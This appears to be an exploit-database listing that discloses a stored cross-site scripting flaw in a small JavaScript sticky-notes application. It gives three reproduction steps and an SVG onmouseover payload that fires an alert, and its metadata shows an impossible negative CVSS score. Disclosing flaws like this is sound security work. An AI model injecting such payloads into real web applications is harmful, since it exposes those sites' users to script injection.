Exploit for Sticky Notes Apps Using JavaScript 1.0 Cross Site Scripting

Name: Exploit for Sticky Notes Apps Using JavaScript 1.0 Cross Site Scripting
Rating: 5 (118 reviews)

2021-03-09 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:161722
# Exploit Title: Sticky Note Apps using JavaScript | Stored Cross Site Scripting  
# Exploit Author: Richard Jones  
# Date: 2021-03-09  
# Vendor Homepage:  
https://www.sourcecodester.com/javascript/14742/sticky-note-apps-using-javascript-source-code.html  
# Software Link:  
https://www.sourcecodester.com/download-code?nid=14742&title=Sticky+Note+Apps+using+JavaScript+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
  
  
Steps to Exploit.   
1. Open the application  
2. Add a new note with the payload below.   
3. Mouse hover over the new posted note  
  
Payload:   
<svg onmouseover="alert(`Stored XSS`)"/>